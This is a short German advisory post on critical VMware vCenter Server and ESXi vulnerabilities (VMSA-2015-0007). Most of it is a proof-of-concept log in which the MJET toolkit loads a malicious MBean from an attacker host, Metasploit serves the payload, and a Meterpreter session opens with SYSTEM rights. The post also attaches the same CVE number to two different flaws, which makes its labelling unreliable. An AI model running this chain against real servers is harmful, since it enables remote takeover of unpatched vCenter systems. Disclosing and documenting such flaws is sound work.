03 Okt

Kritische Lücke in VMware vCenter Server und ESXi

LOGO1

Advisory ID: VMSA-2015-0007
CVE Numbers: CVE-2015-5177 CVE-2015-2342 CVE-2015-1047

CVE-2015-5177 – kritisch
Fehler im JMX-RMI-Service im vCenter Server. – Remote Code Execution
Hier ist bereits ein Metasploit Modul verfügbar.

Proof of Concept:
root@Whack:/opt/mjet# nmap -sS 1.1.1.2 -p 9875 –script=/usr/share/nmap/scripts/rmi-dumpregistry.nse
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-15 16:56 BST
Nmap scan report for 1.1.1.2
Host is up (0.00036s latency).
PORT STATE SERVICE
9875/tcp open java-rmi
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @1.1.1.2:50966
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
MAC Address: 00:0C:29:D1:00:30 (VMware)
root@Whack:/opt/mjet# java -jar mjet.jar -t 1.1.1.2 -p 9875 -u http://1.1.1.1:8080/TArDcls4aeQZVWl
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
--------------------------------------------------- 
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://1.1.1.2:9875/jmxrmi ...
[+] Connected: rmi://1.1.1.2 16
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://1.1.1.1:8080/TArDcls4aeQZVWl
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: drmwfzvo:name=NApCjRCB,id=gsKsVVHK
[+] Invoking: metasploit.Metasploit.run()
[+] Done
Metasploit Shell
-------------------------
2015-02-24 10:11:44 +0000 S:0 J:3 msf exploit(java_mlet_server) >
[*] Using URL: http://1.1.1.1:8080/TArDcls4aeQZVWl
[*] Server started.
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl/
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] Sending stage (30355 bytes) to 1.1.1.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.2:50456) at 2015-02-24 10:12:32 +0000
 
2015-02-24 10:14:10 +0000 S:1 J:3 msf exploit(java_mlet_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: SYSTEM

CVE-2015-5177:
Fehler in der OpenSLP-Funktion – Remote Code Execution
Betroffene Versionen 5.0, 5.1 und 5.5

CVE-2015-1047:
Der vpxd Service bei den Versionen 5.0,5.1 und 5.5 ist für DoS-Attacken anfällig.

Entsprechende Updates sind bei VMware bereits verfügbar.